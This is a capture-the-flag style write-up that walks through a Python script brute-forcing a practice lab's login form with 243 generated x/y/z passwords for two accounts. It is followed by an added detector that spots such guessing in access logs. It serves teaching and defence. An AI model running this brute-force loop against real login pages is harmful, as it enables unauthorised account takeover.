Hello guys,
I'm going to show you how I solved challenge 1 of the SecurityTube challenges by writing a simple Python script.
First, let's have a look at the challenge (URL below):
OK, it gives us some hints:
Hint:
- Company Domain: PentesterAcademy.com
- Usernames: jack, admin
- Password Complexity: 5 characters and uses only x,y,z lowercase. Password examples - xxyyz, xyzxy, xyxxx etc.
OK, as the hints show, we get the password pattern and 2 usernames, so this looks like a brute-force attack on a form :)
A simple calculation: the password uses only three letters (x, y and z) and is 5 characters long, so the number of possible passwords is 3^5 = 243. We have 2 usernames, so the number of tries against this form is 243 * 2 = 486.
OK, let's start coding our script to brute force this form.
I'm going to use urllib2 to connect to a web page:
    #!/usr/bin/env python
    import urllib2
    response = urllib2.urlopen('http://pentesteracademylab.appspot.com//lab/webapp/auth/1/login')
    print response.info()
    # do something
    response.close()
This code gives us the output:

    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache
    Vary: Accept-Encoding
    Date: Wed, 16 Oct 2013 14:59:24 GMT
    Server: Google Frontend
    Alternate-Protocol: 80:quic
    Connection: close

That's the header info, so the connection was made successfully.
Now we need to generate the 243 possible passwords:

    your_list = 'xyz'
    complete_list = []
    for current in xrange(5):
        a = [i for i in your_list]
        for y in xrange(current):
            a = [x+i for i in your_list for x in a]
        complete_list = complete_list+a

This code generates the combinations of every length from 1 to 5, so we need to slice the list and keep only the combinations that are 5 characters long.

    chunk = complete_list[120:363]
    print chunk
    print len(chunk)

The length of chunk is 243. Cool :)
Now let's make a list of users:

    username = ['jack@pentesteracademy.com','admin@pentesteracademy.com']
OK, now we have a list of passwords and a list of usernames. We need to connect to the vulnerable app and try to log in with the generated passwords and the usernames.
We need a for loop over the passwords:

    for pw in chunk:

and another for loop over the usernames nested under the first loop:

        for x in username:

Then we'll print every single try of username and password:

            trying = "Trying with Username \t"+ x +"\t password "+pw + "\n"

As we know, the URL for the vulnerable app is

    http://pentesteracademylab.appspot.com/lab/webapp/1?email=username&password=password

so we will replace the username parameter with the x variable and the password with the pw variable:

            url = ('http://pentesteracademylab.appspot.com/lab/webapp/1?email='+x+'&password='+pw)
That's good: our script will now send requests to the form and try each generated username and password, but we don't read the response yet! We need to know whether the username and password are right or incorrect, so we'll add these lines of code:

            request = urllib2.Request(url)
            response = urllib2.urlopen(request)
            back = response.read()[2486:2492]
Attention: for the line

    back = response.read()[2486:2492]

when you get the response, you need to pick out the part that tells you whether the password is right or incorrect.
If you tried to put

    back = response.read()
    print back

So, we need to slice it from char 2486 to 2492, which is the word "failed".
We'll check whether the output from the page is "Failed" or not for every try:

            print back
            if(back!="Failed"):
                cprint ("Success With Username " +x+ "& Password " + pw ,'red')

And the challenge is successfully solved! :D
Here's the whole code:

    #!/usr/bin/env python
    '''
    Brute Force On Challenge 1
    Ahmed Sherif
    '''
    import urllib2
    import os
    from termcolor import cprint,colored

    # Build every combination of x, y and z for lengths 1 to 5
    your_list = 'xyz'
    complete_list = []
    for current in xrange(5):
        a = [i for i in your_list]
        for y in xrange(current):
            a = [x+i for i in your_list for x in a]
        complete_list = complete_list+a
    # Keep only the 243 combinations that are 5 characters long
    chunk = complete_list[120:363]
    print chunk
    print len(chunk)
    # Every try and its response slice is also written to this file
    f = open('myfile3.txt', 'w')
    username = ['jack@pentesteracademy.com','admin@pentesteracademy.com']
    for pw in chunk:
        for x in username:
            trying = "Trying with Username \t"+ x +"\t password "+pw + "\n"
            print trying
            url = ('http://pentesteracademylab.appspot.com/lab/webapp/1?email='+x+'&password='+pw)
            request = urllib2.Request(url)
            response = urllib2.urlopen(request)
            # Characters 2486 to 2492 of the page hold "Failed" on a wrong login
            back = response.read()[2486:2492]
            print back
            f.write(trying + back + "\n")
            if(back!="Failed"):
                cprint ("Success With Username " +x+ "& Password " + pw ,'red')
    f.close()
or you can download it from here
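
Seen from the server side, the 486 requests above stand out in an access log, because every try is a GET that carries the email and password in the query string. The following Python 3 detector is an added example, not part of the original script or the challenge; the Common Log Format input, the constructed sample lines and IP addresses, the helper name `sample_line` and the threshold of 5 distinct passwords are all assumptions.

```python
import hashlib
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

LOGIN_PATH = "/lab/webapp/1"   # login URL path used by the script above
THRESHOLD = 5                  # assumed: distinct passwords per (source, account)

# Common Log Format: client, identity, user, [timestamp], "request line", status
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def sample_line(ip, email, pw):
    """Build one constructed access-log line (sample data, not real traffic)."""
    return ('%s - - [16/Oct/2013:15:01:02 +0000] "GET %s?email=%s&password=%s '
            'HTTP/1.1" 200 2710' % (ip, LOGIN_PATH, email, pw))

SAMPLE_LOG = [sample_line("203.0.113.7", "jack@pentesteracademy.com", pw)
              for pw in ("xxxxx", "xxxxy", "xxxxz", "xxxyx", "xxxyy", "xxxyz")]
SAMPLE_LOG += [
    sample_line("198.51.100.20", "admin@pentesteracademy.com", "zzzzz"),
    sample_line("198.51.100.20", "admin@pentesteracademy.com", "zzzzz"),  # same value retried
    '198.51.100.20 - - [16/Oct/2013:15:02:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    "truncated or malformed line",
]

def find_password_guessing(lines, threshold=THRESHOLD):
    """Return {(source, account): distinct password count} at or above threshold."""
    seen = defaultdict(set)
    for entry in lines:
        m = CLF.match(entry)
        if not m:
            continue                      # skip lines that do not parse
        ip, _method, target, _status = m.groups()
        url = urlsplit(target)
        if url.path != LOGIN_PATH:
            continue                      # not a login attempt
        query = parse_qs(url.query)
        email = query.get("email", [""])[0].lower()
        password = query.get("password", [""])[0]
        if not email or not password:
            continue
        # Track a digest only: the query string already put the value in the log.
        seen[(ip, email)].add(hashlib.sha256(password.encode()).hexdigest())
    return {key: len(pws) for key, pws in seen.items() if len(pws) >= threshold}

if __name__ == "__main__":
    for (ip, email), n in find_password_guessing(SAMPLE_LOG).items():
        print("ALERT %s tried %d distinct passwords for %s" % (ip, n, email))
```

Counting distinct passwords rather than raw requests keeps a user who retries the same wrong password from being flagged.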